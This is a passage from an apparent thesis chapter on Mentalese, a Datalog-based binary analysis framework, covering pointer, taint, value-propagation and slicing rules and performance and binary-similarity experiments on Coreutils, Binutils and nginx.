PPtsP(Pop(descr1),id1, disp, descr2, id2, bb, order, caller) :- 2 PPtsP(descr1, id1, disp, descr2, id2, _, _, _), ILAddrToAddr(bb, order, AddrOf(descr1)), Register(_,_,_,_,bb,_,caller).

// collects from callers PtsTo(V1,-1, "R", descr2, id2, bb, order, ctx) :- chain_mr(base, disp, V1, bb, order , ctx), 3 PtsTo(base, -1, "R", descr1, id1, _,_, ctx), ILAddrToAddr(bb, _, AddrOf(descr1)), Register(_,_,_,_,bb,_,caller_ctx), PPtsP(Pop(descr1), id1, disp, descr2, id2, _, _, caller_ctx).

PtsTo(reg, -1, "R", Pop(descr), id, bb, order, ctx_caller) :- returns_pointer(_, descr, id, ctx_callee), 4 CallTo(_, ctx_callee, _, _, bb, _, ctx_caller), Register(_, f_ret_reg, "u", _, bb, order, ctx_caller), match("f_ret_.*", f_ret_reg), Register(_, reg, "d", _, _, _, bb, order, ctx_caller).

GlobalPtr(reg, cst_val, bb, order, ctx) :- 5 Memory(_, "load", "Cst", cst_id, _, bb, order, ctx), Constant(cst_id, cst_val, bb, order, ctx), Register(_, reg, "d", _, bb, order, ctx).

6 PtsTo(reg, -1, "R", "Global", approx_addr, bb, order, ctx) :- GlobalPtr(reg, approx_addr, bb, order, ctx).

Figure 3.12: Extensions for Context-sensitivity.

The third rule of Figure 3.12 increases precision in situations as follows: mov rax, [rbp-0x10] mov rax, [rax + 8] 3. Mentalese - A Binary Analysis Framework 69

This sequence of x86-64 instructions are part of a routine which processes a linked list. It accesses the next pointer and moves that value to rax. When we see such a memory to register load, usually the third rule in Figure 3.11 takes effect. However, in some cases the callee doesn’t know that the dereferenced value is a pointer as well. This is resolved by our third rule in Figure 3.12. The fourth rule to context-sensitivity handles return values that are pointers. It maps them back to f_ret registers in the caller (see Section 3.3.2). Here we use a builtin functor, match that looks if the used register is a f_ret_* register. At the callsite we now have PtsTo fact that points to the same locations as the return value. The fifth rule is not necessarily an extension to context-sensitivity, but for convenience reasons we added it here. This rule looks for memory loads where the base is a constant, acquires that value through Constant facts and looks for a register that is defined at that address. This register is treated as a global pointer and we derive such a pattern as a GlobalPtr fact. The last rule copies the GlobalPtr facts into instances of PtsTo facts. The motivation for this separation is driven by the fact that we might not want globals be part of the analysis. We can still query for them but they can be simply guarded here as a choice. This section has shown how flexible we can add precision and sensitivity to our analysis. Usually, for context-sensitive approaches an interprocedural control flow graph (ICFG) is constructed, and the corresponding logic of the algorithms applied to it. Our approach builds this ICFG on the fly and on demand.

3.5 Analysis Derivatives

In the previous section we presented the backend of Mentalese and how we built and implemented techniques for a field and context-sensitive binary analysis with partial flow-sensitivity which we improved for more precision. Although we have explicitly applied the techniques for pointer analysis, the patterns also apply for other analyses that we present in this section. Basically each information flow analysis we present is a derivative of what we have seen so far.

3.5.1 Taint-Analysis

Taint analysis is a widely used term for a source to sink information flow analysis. In Chapter 4 we use it as a building block to find and trigger exploitation primitives for web browsers. Defining sinks and customize taint propagation policies is a cumbersome task in many frameworks we tested. We seek for analysis procedures that interplay transparently, i.e., information exchange is naturally adapted by the 70 3.5. Analysis Derivatives

Terms Description

t0 reg: base register

t1 disp: displacement added to base or −1 if access = "R"

t2 access: t2 ∈ {R,D}

t3 taint_descr: descriptor

t4 color: specific ID/taint tag attached to the pointer

t5 . . . t7 bb, order, ctx: IL-address

Figure 3.13: Taint specification: Taint(reg, disp, color, taint_descr, bb, order, ctx). analyses. In this section we present an accessible route to taint analysis and how it enters into symbiosis with other analysis procedures that can be implemented in Mentalese. In fact, we can interpret pointer analysis as an information flow analysis with specific taint policies. Propagation of information is modeled through transfer descriptors which we defined in Section 3.4.1. For instance, we use the following taint propagation rule for a register to register move event: Taint(reg2, -1, "R", descr, color, bb, order, ctx) : - chain_rr(reg1, reg2, bb, order, ctx) , Taint(reg1, -1, "R", descr, color, _ , _ ,ctx).

This is the same recursive rule we used in the pointer analysis. All we need, is to change the name of the predicates to Taint and extend the set of rules to cope with the needs of a taint analysis. For clarity we define a predicate Taint as presented in Figure 3.13. This definition is isomorph to the Pts definition. The descriptor follows the same task as utilized for the pointer analysis, i.e., keeping track of the context. The only difference is the tuple which is defined as P → T aint × L. In common literature about taint analysis we often see the term color which is used to indicate taint that comes from different sources. We use the term in our predicate with the same purpose, but we treat the color as a number. We don’t perform any operations on these color values, that is, mixing them or adding them up. Instead we look at the facts at the locations or sinks of interest to see if we have any taint information with different color IDs. The propagation for each ID is performed until the system saturates. We don’t give a complete set of 3. Mentalese - A Binary Analysis Framework 71

rules as the patterns are almost the same for the taint analysis as those for the pointer analysis. In Figure 3.14 we present extensions that are new to the taint analysis. For a compact presentation we use a syntactic sugar for a disjunction which is supported by the Soufflé engine.

The (P1; P2) language construct in the figure stands for a disjunction of P1

and P2. We can express the same thing with two rules, one rule with an explicit

P1 in its body, and the other rule with an explicit P2.

Rule Interplay

We want to go into more detail about the set of rules in Figure 3.14. The first rule follows the same functionality as the third rule in Figure 3.11: it looks for memory to register events by utilizing the corresponding transition descriptor, ignores stack bases3, and finally looks if the dereferenced value is tainted or the base itself. The reader might ask why we make a disjoint query and check for the taint status of the base register. This choice is motivated by the fact that if we control the base then we might be able to redirect the memory load to a controlled section, i.e, we control the loaded value. Rule 2 in Figure 3.14 looks for equation to register patterns, and checks if any of the operands are tainted. Rules 3 and 4 follow the same pattern for the other equation events. Rule 5 is a so called glue-rule: seeing the nature of our rule set, it seems obvious to merge the taint analysis and pointer analysis into one analysis procedure. This idea is also followed by Grench and Smarakdakis [90]. To ensure flexibility, Mentalese is implemented with a base set of propagation rules and each analysis extends this set of rules for its own purpose. Merging analyses facts are performed with glue-rules, which combine the predicates of interest into one rule, basically gluing them together. The functor, contains, is built in and checks for two PtsTo facts if one pointer-descriptor is a prefix of the other or, more precisely, part of the context of the other. This allows us to walk bidirectional, from caller to callee and vice versa. Without the fifth rule, the taint analysis comes with a disadvantage; think of a scenario where we have a linked list and one of its attributes is an integer that is user controlled. The pointer to the element is passed to a function where another list element is created and its integer field depends on the integer field of the passed element. The following C-code simulates the scenario as illustrated in Figure 3.16. The id parameter of function process is user controlled and is used to initialize the id attribute of the list element el. The function f1 gets the list element and

3Please refer to Section 3.4.3 on why stack bases are handled differently to achieve more precision with respect to flow-sensitivity. 72 3.5. Analysis Derivatives

Taint(reg,-1, "R", descr, col, bb, order, ctx) :- chain_mr(base, disp, reg, bb, order, ctx), 1 !StackBased(base), ( Taint(base, -1, "R", descr, col, _, _, ctx); Taint(base, disp, "D", descr, col, _, _, ctx) ).

Taint(reg_def, -1, "R", descr, col, bb, order, ctx) :- chain_eqrr(reg_def, reg1, _, reg2, 2 bb, order, ctx), ( Taint(reg1, -1, "R", descr, col, _, _, ctx); Taint(reg2, -1, "R", descr, col,_, _, ctx) ).

Taint(reg_def, -1, "R", descr, col, bb, order, ctx) :- chain_eqmr(reg_def, base, disp, _, reg2, bb, order, ctx), 3 ( Taint(base, disp, "D", descr, col _,_,ctx); Taint(base, -1, "R", descr, col, _,_,ctx); Taint(reg2, -1, "R", descr, col, _,_,ctx) ).

Taint(reg_def, -1, "R", descr, col, bb, order, ctx) :- chain_eqrm(reg_def, reg, _, base, disp, bb, order, ctx), 4 ( Taint(base, disp, "D", bb,order,ctx); Taint(base, -1, "R", descr, col, _,_,ctx); Taint(reg2, -1, "R", descr, col, _,_,ctx) ).

Taint(reg2, disp, "D", descr_t, col, bbl, orderl, ctx2) :- Taint(reg, disp, "D", descr_t, col, bb, order, ctx), PtsTo(reg, -1, "R", descr, _, bb, order, ctx), 5 ctx != ctx2 , PtsTo(reg2,-1, "R", descr2, _, addr2, ctx2), contains(descr, descr2), chain_mr(reg2, disp, _, bbl, orderl, ctx2).

Figure 3.14: Rule Set: Extensions for Taint Analysis. creates a new list element which is linked to el. Its id attribute depends on the controlled id attribute of the first element. In a dynamic approach, taint analysis is usually achieved through shadow memory techniques [188]. During the execution, we can always check for the states which makes taint analysis more accessible through dynamic techniques. Statically, we need to make assumptions about all possible paths and make sure it scales and 3. Mentalese - A Binary Analysis Framework 73

rsp_0 -24 D HeapPtr,0x401182,0x40119c 0 0x40113e f1 rsp_0 -16 D HeapPtr,0x401147 0 0x4011c4 main rsp_0 -8 D HeapPtr,0x401147 0 0x40114c f1 rsp_0 -8 D HeapPtr,0x401182 0 0x401187 main rax_0 -1 R HeapPtr,0x401147 0 0x401147 f1 rax_0 -1 R HeapPtr,0x401182 0 0x401182 main rax_1 -1 R HeapPtr,0x401182 0 0x40118b main rax_1 -1 R HeapPtr,0x401182,0x40119c 0 0x401150 f1 rdi -1 R HeapPtr,0x401182,0x40119c 0 0x40113e f1 rdx_1 -1 R HeapPtr,0x401147 0 0x401163 f1 rdi_1 -1 R HeapPtr,0x401182 0 0x401199 main rax_2 -1 R HeapPtr,0x401182 0 0x401195 main rax_3 -1 R HeapPtr,0x401147 0 0x401159 f1 rax_3 -1 R HeapPtr,0x401182 0 0x40119c main rax_4 -1 R HeapPtr,0x401182 0 0x4011a1 main rax_4 -1 R HeapPtr,0x401182,0x40119c 0 0x40115f f1 rax_4 8 D HeapPtr,0x401147 0 0x401167 f1 rax_5 -1 R HeapPtr,0x401147 0 0x4011a5 main rax_9 -1 R HeapPtr,0x401182 0 0x4011bc main rax_10 -1 R HeapPtr,0x401147 0 0x4011c0 main rax_11 -1 R HeapPtr,0x401147 0 0x4011c8 main rax_12 -1 R HeapPtr,0x401182 0 0x4011d2 main rax_13 -1 R HeapPtr,0x401147 0 0x4011d6 main rax_1 0 D Taint,0x40118f 0 0x40118f main rax_1 0 D Taint,0x40118f 0 0x401154 f1 rax_2 -1 R Taint,0x40118f 0 0x401154 f1 rdx_0 -1 R Taint,0x40118f 0 0x401156 f1 rax_3 0 D Taint,0x40118f 0 0x40115d f1 rax_5 0 D Taint,0x40118f 0 0x4011a9 main rax_6 -1 R Taint,0x40118f 0 0x4011a9 main

Figure 3.15: PtsTo and Taint output of the program presented in Figure 3.16 . terminates. With the taint analysis we presented so far, we cannot see the taint after f1 is called. We cannot even see the taint in f1 itself. Here the pointer analysis can help us to improve precision. The analysis reveals the connection between el and el2, as well as the connection between el->id and el_p->id. Now the taint analysis can use these information to taint el2->id and see that the access after f1 is to be tainted. In the assembly code the tainted el->id happens at 0x40118f. Without pointer information the taint propagation stops there. For clarity, we present the output of the pointer and taint analysis in Figure 3.15. With the instruments that we have presented, the analysis is able to derive alias pairs. We highlighted the relevant lines in Figure 3.15 to explain the procedures. The highlighted addresses 0x40118b and 0x40118f correspond to the lines 13 and 14, respectively. The address 0x401150 is where line 8 starts in function f1. With the pointer descriptors HeapPtr,0x401182 at 0x40118b and HeapPtr,0x401182,0x40119c at 0x40118f, we see that registers rax_14 point to the same address. The taint is applied at address 0x40118f. With rule 5 of our

4The same names of both registers is coincident. 74 3.5. Analysis Derivatives algorithm in Figure 3.14 the analysis can derive the fact that the dereferenced value at address 0x401154 is tainted as we can see in Figure 3.15. Moreover, we can now see that el->next->id is also tainted after the f1 call which is indicated by the Taint fact that corresponds to address 0x4011a9. This strategy is a valuable building block and finds a broad application in the field of vulnerability research. In the next Chapters we show how the concepts work in practice.

3.5.2 Value Propagation

As with all derivatives we present, a common ground are our transition descriptors which describe how we propagate information from one program point to another. However, this time we are interested in the actual concrete values that are propagated and evaluated rather than symbolic values as we did so far. Value propagation is not to confuse with constant propagation where a variable after propagation holds a constant value for all possible executions. Rather we are interested how concrete values evolve over all execution paths. This can be helpful for several reasons: 1) for incorporating values from a dynamic analysis, 2) evaluating possible error codes that are returned, 3) determining value ranges, 4) concretizing symbolic expressions and evaluating its effects. Speaking of a derivative, value propagation can be expressed in the same pattern following the same ideas as the procedures we have presented for the pointer analysis. Accordingly, the predicate we define has a similar encoding as the predicates we defined for pointer and taint analysis. The following rules derive Concrete facts by querying for constant to register/memory events. // direct assignment to a register*/ Concrete(reg, -1, "R", to_string(cst_num), bb, order, ctx) :- chain_cr(cst_num, reg, bb, order, ctx).

// direct assignment to memory Concrete(reg, disp, "M", to_string(cst_num), bb, order, ctx) :- chain_cm(cst_num, reg, disp, bb, order, ctx).

Here, we are particularly interested in the constants that are hard coded into the binary. We refrain from presenting a thorough specification of the algorithm, as it follows the same principle as the algorithms for the other analysis derivatives. The rules above are starter-rules that get the algorithm running without any user intervention. These rules alone help us to track error codes, map them on f_ret registers in the caller, and build a base for interesting patterns, such as signed unsigned conversion errors or missing checks. We might want to introduce Concrete 3. Mentalese - A Binary Analysis Framework 75

facts or starter-rules that constrain the terms for a concretization. With this procedure, we basically instrument the code allowing us to concretize any register or memory operand at any program point and each analysis that uses or builds on Concretes adapts to the changes transparently.

3.5.3 Slicing

Program Slicing is another classic in the line of program analysis techniques that help to sharpen the image about the program’s behavior. Given a program point p, and a set of program variables, the idea is to determine all statements that might affect the values of the program variables at p. The resulting set of statements is a slice. The set of variables at the statements can further be restricted to the uses and definitions of the statement at p. The idea, originally discussed by Weiser [211], has gone through a wealth of extensions and improvements corresponding to different needs [184]. Ottenstein and Ottenstein [155] pointed out that the PDG is well suited for the intraprocedural slicing problem, by traversing all reachable paths with respect to the variable of interest and put the visited nodes into the slice. It is still common practice to work on the PDG when program slicing is needed. The notion of valid paths or realizable paths, i.e., paths that respect the call-stack, are important in the interprocedural case. The concept of using PDGs was extended by Horwitz et al. [101] who proposed the System Dependence Graph (SDG) as a suitable representation for interprocedural slices. We treat slicing as a taint problem: A forward slice is our forward taint. The only difference is that for each program point we also take the control dependency into account, i.e., the conditionals that enclose the program points and which have to be sliced as well. Analogously, backward slicing is treated as as backward taint problem, again, by incorporating the control dependency into the analysis. In Section 3.5.1 we saw that a pointer analysis can improve the precision of the taint analysis. The same property holds for slicing. In the backward case we need to adapt our rule-sets and adjust them for a backward propagation. For instance, for chain_rm descriptor matches which describe a register to memory move, we write a slicing rule where propagation flows in the opposite direction using the same descriptor. We can use the same set of rules as for the forward-slicer/taint case and change their direction. For this reason we won’t specify the algorithm as the concepts of the algorithms are the same. The CDG generation of each function can either be implemented in the frontend and be incorporated into Mental-IR, or directly be implemented in the backend. Because the frontend of Mentalese has all the instruments to build the CDG, we use the former approach. 76 3.5. Analysis Derivatives

1 typedef struct element { 2 int id; 3 struct element* next; 4 } element_t; 5 6 void f1(element_t* el_p) { 7 element_t* el2 = (element_t*) malloc( sizeof (element_t)); 8 el2->id = el_p->id + 1; 9 el->next = el2; 10 } 11 12 int process (int id) { 13 element_t* el = (element_t*) malloc( sizeof (element_t)); 14 el ->id = id; 15 f1(el ); 16 // access el->next->id is tainted 17 ... 18 } == process == ... 0x000000000040117d mov edi,0x10 0x0000000000401182 call 0x401040

0x0000000000401187 mov QWORD PTR [rbp-0x8],rax 0x000000000040118b mov rax,QWORD PTR [rbp-0x8] 0x000000000040118f mov DWORD PTR [rax],rbx ;rbx = id 0x0000000000401195 mov rax,QWORD PTR [rbp-0x8] 0x0000000000401199 mov rdi,rax 0x000000000040119c call 0x401136

0x00000000004011a1 mov rax,QWORD PTR [rbp-0x8] 0x00000000004011a5 mov rax,QWORD PTR [rax+0x8] 0x00000000004011a9 mov eax,DWORD PTR [rax] ... == f1 == 0x0000000000401136 push rbp 0x0000000000401137 mov rbp,rsp 0x000000000040113a sub rsp,0x20 0x000000000040113e mov QWORD PTR [rbp-0x18],rdi 0x0000000000401142 mov edi,0x10 0x0000000000401147 call 0x401040 0x000000000040114c mov QWORD PTR [rbp-0x8],rax 0x0000000000401150 mov rax,QWORD PTR [rbp-0x18] 0x0000000000401154 mov eax,DWORD PTR [rax] 0x0000000000401156 lea edx,[rax+0x1] 0x0000000000401159 mov rax,QWORD PTR [rbp-0x8] 0x000000000040115d mov DWORD PTR [rax],edx 0x000000000040115f mov rax,QWORD PTR [rbp-0x18] 0x0000000000401163 mov rdx,QWORD PTR [rbp-0x8] 0x0000000000401167 mov QWORD PTR [rax+0x8],rdx 0x000000000040116b nop 0x000000000040116c leave 0x000000000040116d ret

Figure 3.16: C routine and its x86-64 assembly code (O0). 3. Mentalese - A Binary Analysis Framework 77

3.6 Experimental Study: Pointer Analysis

As we saw in the previous sections, the pointer analysis is a valuable building block that finds versatile usage in aiding the precision of other analyses. In this section we provide empirical data that concerns the pointer analysis and show that it can contribute to the precision of binary similarity. The following experiments are performed on a an Intel(R) Core(TM) i7-3520M CPU @ 2.90GHz and 16GB of RAM. This is lightweight hardware for static analysis: we choose this setup to evaluate how our analysis scales on commodity hardware, i.e., more accessible hardware which might be the workstation of an analyst. Table 3.3 shows the number of facts extracted according to the EDB facts of Table 3.1. The numbers are evaluated for the 10 largest binaries in the GNU Coreutils utility suite. The Coreutils are small programs built with the UNIX philosophy in mind to do one thing and do it well. Many of the functions that are mentioned in the table are common in multiple utilities. The main functionality of each binary is mostly scaled down to a single source file. This simplicity seems to be reflected by the pointer analysis as well, as we did not have to adjust the context-sensitivity or the flow sensitivity. Each analysis finished within a second. Table 3.4 lists the number of facts for x86-64 concerning nginx and the three largest Binutils. Comparing the highest number (objdump) to the highest among the Coreutils (ginstall), we see an increase by a factor of almost 13. A higher number of facts does not necessarily mean a higher complexity, but the numbers are a good indicator. As Table 3.5 shows, our pointer analysis faces a greater challenge with these programs. With FS + RD we denote the partial flow-sensitivity enhanced by the reaching definition analysis (see Section 3.4.3). Apparently, FS - RD denotes the partial flow-sensitivity gained through SSA. Each k-column represents the

context-sensitivity level. A level of zero (k0) transforms the analysis to a pure forward propagation of points-to information, i.e., no information is gained through the callee. This is compliant to the definition as a level of zero means that we are not interested in any information that comes from a callee. The results in Table 3.5 show the performance (in seconds) between different

k-values and flow-sensitivity settings. The first and second digit (d1/d2) are the performance values for O0 and O2 respectively. Digits that are not presented (indicated by a line) denote that our analysis exhausted our 16GB of RAM. In some cases the number of new points-to facts can saturate with increasing k-sensitivity. We can see this happen for nginx optimized with O2. The performance is the same from a level of 1 onwards. 78 3.6. Experimental Study: Pointer Analysis

Table 3.3: GNU Coreutils v8.32 (O0 compilation): Number of facts.

Binary #Functions #Armv7 #x86-64

cp 520 216286 259302

df 329 153973 158399

dir 534 287612 245899

du 529 442890 443992

env 179 85014 73024

ginstall 570 237629 285799

ls 534 287612 245899

mv 537 260469 261571

rm 296 137569 129250

stat 297 179871 126354

Table 3.4: Number of facts for Binutils v2.35 and nginx v1.17.9.

Binary Functions Facts

nginx 1634 1842856

ar 2121 2469669

nm-new 2222 2678793

objdump 2801 3572471

Turning off the enhanced flow-sensitivity gets us to a k-sensitivity of 2. The number of facts extracted for the Binutils is reduced by 9 percent for ar and 15 percent for objudmp. This has impact on the performance which we can see for O2 in Table 3.5. For all binaries in our testsuite including Coreutils, the memory facts are reduced by 50 percent on average. Most of these facts are stack related which has an impact on the reaching definition analysis which we perform on stack variables to improve the partial flow-sensitivity (see Section 3.4.3). The numbers are listed in Table 3.6. This explains why we can reach higher levels 3. Mentalese - A Binary Analysis Framework 79

Table 3.5: Pointer Analysis performance: O0/O2 seconds in relation to k-sensitivity and flow-sensitivity. FS-RD denotes partial flow sensitivity (FS) without a reaching definition analysis (RD) for stack variables. For missing values, the analysis ran out of RAM.

Partial FS + RD FS - RD

Binary

k0 k1 k2 k3 k4 k0 k1 k2 k3 k4 ar 16/10 28/7 −/17 −/90 −/− 8/6 8/7 9/12 17/47 −/− nginx 11/5 16.7/5.4 25.6/5.6 330/5.8 −/5.8 5/3 8.7/4 9.5/4 80/4 −/4 nm-new 17/17 69/17 −/53 −/− −/− 8/6 12/9 39/39 −/− −/− objdump 25/15 −/23 −/23 −/− −/− 12/8 23/9 98/16 −/− −/−

Table 3.6: Reduction in the number of Memory-facts from O0 to O2 for x86-64.

Binary Reduction in %

ar 45 cp 58 df2 54 dir 50 env 54 ginstall 50 ls 50 mv 48 nginx 50 nm-ne 49 objdump 48

for both, the enhanced flow-sensitive analysis and its counterpart because many stack accesses are optimized away. In Figure 3.17 we illustrate the number of points-to facts for the Binutils and nginx. Due to the high number of facts for nginx, we separately present the numbers in a different scale for its O2 counterpart. We can see that with an increasing level of context-sensitivity (k values) the number of facts explode. 80 3.6. Experimental Study: Pointer Analysis

It explains why we ran out of RAM for the enhanced flow-sensitive analysis5. Recall that our enhanced flow-sensitive analysis computes an on demand reaching definition analysis for each stack location that holds a pointer. This results in new facts for each reaching program point.

Towards Similarity

Pointer analysis, while limited in this regard, can also aid in the process of binary similarity. Our strategy follows the pattern to determine memory accesses that are not stack-based and for which we know that they are pointers to some objects. We can express this by the following interplay of rules: Access(base, disp, "load", bb, order, ctx) :- Memory(_, "load", "Reg", base_id, disp, bb, order, ctx), Register(base_id, base, "u", _, bb, order, ctx).

Access(base, disp, "store", bb, order, ctx) :- Pointer(_, "store", "Reg", base_id, disp, bb, order, ctx), Register(base_id, base, "d", _, bb, order, ctx).

/* * AP ~ Memory Access through a pointer * derived by a points-to fact */ AP(descr, disp, bb, order, ctx) :- Access(base, disp, _, bb, order, ctx), !StackBased(base), PtsTo(base, -1, "R", descr, _, bb, order, ctx).

Each derived AP fact gives us a pointer-descriptor (see Definition 7), and the displacement added to the pointer to access the memory location. With these access patterns we map each descriptor to a set of accessed fields. Combined with PPtsP facts (pointer-points-to-pointer), we give weight to fields that point to a pointer. The following output shows a snippet of AP facts that are derived when rules are applied on objdump: [’HeapPtr,0x559cc8,xmalloc’, ’56’, ’0x444885’, ’ieee_start_struct_type’], [’HeapPtr,0x559cc8,xmalloc’, ’56’, ’0x404d73’, ’try_print_file_open’], [’HeapPtr,0x559cc8,xmalloc’, ’56’, ’0x4053d3’, ’show_line’], [’HeapPtr,0x559cc8,xmalloc’, ’56’, ’0x4053df’, ’show_line’], [’HeapPtr,0x559cc8,xmalloc’, ’56’, ’0x4053ed’, ’show_line’], [’HeapPtr,0x559cc8,xmalloc’, ’56’, ’0x405416’, ’show_line’], [’HeapPtr,0x559cc8,xmalloc’, ’56’, ’0x405427’, ’show_line’],

[’HeapPtr,0x559cc8,xmalloc’, ’120’, ’0x434f84’, ’stab_record_variable’], [’HeapPtr,0x559cc8,xmalloc’, ’120’, ’0x434fc5’, ’stab_record_variable’], [’HeapPtr,0x559cc8,xmalloc’, ’120’, ’0x434fe4’, ’stab_emit_pending_vars’], [’HeapPtr,0x559cc8,xmalloc’, ’120’, ’0x435051’, ’stab_emit_pending_vars’],

5We are working on 16GB on purpose, which is a lightweight setup. 3. Mentalese - A Binary Analysis Framework 81

The descriptor tells us that we are confronted with a heap pointer that was allocated at 0x559cc8 in xmalloc. The output also tells us which displacements are added to the pointer to access memory and in which function these accesses occur. For instance, the first line of the output says that in ieee_start_struct_type at address 0x444885, 56 is added to the pointer to access memory. We build a hash map that maps this descriptor to a set of fields that we can derive through our analysis. We refer to this map as a descriptor-map. We extend the set of fields with the output we gain from PPtsP to determine fields that are pointers. The following output lists the offsets to the fields we gain from PPtsP: [0, 8, 16, 24, 32, 40, 80, 88, 120, 136, 416]

The output tells us that adding each of these offsets to the base pointer that comes from 0x559cc8, gives us references to memory cells (fields) which hold a pointer. In the set of all fields that are associated with the pointer-descriptor, we now over-represent those fields that point to pointers building a multiset of fields. To compare two binaries, we compute the Jaccard index between each of these sets in each binary. The motivation behind this approach is that certain objects have distinctive field offsets. In our example we can see field offsets of 120 and 416. Both of these fields might already have a distinctive character because of their offsets, but it gets a more distinctive characteristic due to their property that they hold pointers. For a good similarity match we need structures with many fields. In our experiments we only take descriptors into account that are associated with sets of fields with 7 or more elements. Although we can also use this strategy to match several functions, the capabilities for this are limited. The focus of our strategy lies not in matching functions, but to match a stripped binary. We evaluated the approach on our testsuite binaries that are listed in Table 3.3 and Table 3.4. Recall that for the Coreutils there are no restrictions on the analysis, i.e, we don’t restrict the context-sensitivity level by k and we use the enhanced flow-sensitivity method. The experiments for Binutils, however, are performed with a k-sensitivity of zero. We do this in favor of the analysis time. Our results suggest that going with k = 0 is a good choice to start, and we can successively increase k when we need to. The match is determined for O0 vs O2 and vice versa. We also added so- called distro versions6 of the Binutils and nginx into our testsuite, which are matched against O2. The results for the first two ranks are listed in Table 3.7.

6Ubuntu 18.04.4 LTS 82 3.6. Experimental Study: Pointer Analysis

1e6 1e6 1e6 objdump-pfs ar-pfs nm-new-pfs 3.0 objdump-efs ar-efs nm-new-efs objdump-pfs-O2 ar-pfs-O2 3.0 nm-nw-pfs-O2 objdump-efs-O2 2.5 ar-efs-O2 nm-new-efs-O2

2.5 2.5

2.0 2.0 2.0

1.5 1.5 1.5 Points-To Facts

1.0 1.0 1.0

0.5 0.5 0.5

0.0 0.0 0.0 0 1 2 3 0 1 2 3 0 1 2 3 k-sensitivity k-sensitivity k-sensitivity

1e7 nginx-pfs nginx-pfs-O2 100000 nginx-efs nginx-efs-O2 nginx-pfs-O2 nginx-efs-O2 4

80000

3

60000

2 Points-To Facts 40000

1 20000

0 0 0 1 2 3 4 0 1 2 3 4 k-sensitivity k-sensitivity

Figure 3.17: Number of Points-To facts for Binutils and nginx in relation to k- sensitivity and flow sensitivity. With fs we denote the partial flow-sensitivity + reaching definition. With nfs we refer to its counterpart without reaching definition. 3. Mentalese - A Binary Analysis Framework 83

Except for three cases, each binary is correctly matched within the first two ranks. For objump-O2, we have objdump ranked on 3, mv shows stronger attachment to the Binutils and its O2 counterpart is ranked on 4; ginstall shows a similar pattern and is ranked on 3. For objdump we can tweak the match by increasing k to 1 improving its rank to 1. In Figure 3.18 we illustrate all matches that are within the top-10. Scores outside the top-10 are given a score of zero. Our experiments with ARMv7 show similar results: For ARM, our testsuite consists of Binutils and Coreutils from Debian Jessie and Bullseye7 where the versions of the programs are 5 years apart. We match the pool of old programs with the pool of their newer versions. The results are listed in Table 3.8. Similar to our x86 experiments we illustrate all matches within the top-10 in Figure 3.18. The results show that the Coreutils are all ranked in top-2. Binaries from the same family (Binutils vs Coreutils) show a stronger affinity regarding the similarity to each other which is compliant to our expectation. The quality of the matching can be influenced by many factors, such as aggressive optimization, quality of the CFG reconstruction, obfuscation, or many changes to the code base. We can see that the newer version of objdump and readelf do not match well against the older versions. This suggests that the new versions might have undergone a lot of code changes. We investigated this for readelf and objump by diffing their corresponding versions. Indeed, for readelf we observe changes around 10k lines of code, and for objdump around 2k lines of code. These numbers are relatively large compared to nm and ar where the changes are between 200 to 370. The larger amount of changes to objdump and readelf suggest that they have an influence on the quality. Overall, the experiments show promising results given that the whole process runs within a minute for the binaries we tested. We believe that the approach we presented is well suited for a first run that can be combined with more fine- grained similarity approaches, such as [158]. Of course the timings are dependent on the sensitivity of the pointer analysis which we can successively increase on demand. However, our experiments indicate that in most cases k = 0 might be sufficient. It is worth the effort to investigate this further on larger testsuites and we leave this for future work.

7Debian testing at the time of writing. 84 3.6. Experimental Study: Pointer Analysis

Table 3.7: Ranks 1 and 2 of matches compiled for x86-64: Binutils are in v2.35, Coreutils in v8.32, and nginx in v1.17.9. Binaries denoted with distro are taken from Ubuntu 18.04.4 LTS. Binutils-distro are in v2.30, and nginx-distro in v1.14.0

Binary Rank Binary Rank

1 : ar-O2 1 : nm-new-O2 ar nm-new 2 : nm-new-O2 2 : objdump-O2 1 : ar 1 : ar ar-O2 nm-new-O2 2 : nm-new 2 : nm-new 1 : ar-O2 1 : nginx-O2 ar-distro nginx 2 : nm-new-O2 2 : ar-O2 1 : cp-O2 1 : nginx-stro cp nginx-O2 2 : dir-O2 2 : nginx 1 : cp 1 : nginx-O2 cp-O2 nginx-distro 2 : df 2 : nm-new-O2 1 : env-O2 1 : objdump-O2 df objdump 2 : df-O2 2 : nm-new-O2 1 : df 1 : nm-new df-O2 objdump-O2 2 : env 2 : ar | 3 : objdump 1 : dir-O2 1 : objdump-O2 dir objdump-distro 2 : ls-O2 2 : df-O2 1 : dir 1 : objdump-O2 dir-O2 mv 2 : ls 2 : ar-O2 | 4: mv-O2 1 : env-O2 1 : mv env mv-O2 2 : df-O2 2 : ginstall | 3: ginstall-O2 1 : df 1 : objdump-O2 env-O2 ginstall 2 : env 2 : ar-O2 1 : dir-O2 1 : mv ls ginstall-O2 2 : ls-O2 2 : ginstall 1 : dir ls-O2 2 : ls 3. Mentalese - A Binary Analysis Framework 85 env df-O2 objdump-O2 ls objdump dir-O2 mv env-O2 ginstall objdump-distro ls-O2 nm-new nm-new-O2 ar-distro lighttpd-distro mv-O2 nginx-distro ar ginstall-O2 ar-O2 nginx nginx-O2 cp-O2 cp df dir

env 1.0 df-O2 objdump-O2 ls objdump dir-O2 0.8 mv env-O2 ginstall objdump-distro ls-O2 0.6 nm-new nm-new-O2 ar-distro lighttpd-distro mv-O2 0.4 nginx-distro ar ginstall-O2 ar-O2 nginx 0.2 nginx-O2 cp-O2 cp df dir 0.0 cp-8.32 ar-2.34 ar-2.25 cp-8.23 mv-8.32 df-8.32 objdump-2.25 objdump-2.34 mv-8.23 ls-8.32 rm-8.32 df-8.23 nm-2.25 ls-8.23 readelf-2.25 rm-8.23 gprof-2.25 nm-2.34 readelf-2.34 gprof-2.34 1.0 cp-8.32 ar-2.34 ar-2.25 cp-8.23 0.8 mv-8.32 df-8.32 objdump-2.25 objdump-2.34 0.6 mv-8.23 ls-8.32 rm-8.32 df-8.23 0.4 nm-2.25 ls-8.23 readelf-2.25 rm-8.23 0.2 gprof-2.25 nm-2.34 readelf-2.34 gprof-2.34 0.0

Figure 3.18: All matches of top-10 ranks. The upper matrix shows the results for x86-64, the lower matrix shows the results for Armv7. A score that does not make it into the top-10 is given a score of 0. O0 vs O0 and O2 vs O2 binaries are not matched for x86. Similarly, for ARMv7 the versions old vs old and new vs new are not matched. 86 3.6. Experimental Study: Pointer Analysis

Table 3.8: Ranks 1 and 2 of matches for ARMv7 (EABI LE): Binutils v2.25 vs v2.34 and Coreutils v8.23 vs 8.32. If matching score between two versions of the same program is not in the top-2, its rank is given explicitly.

Binary Rank Binary Rank

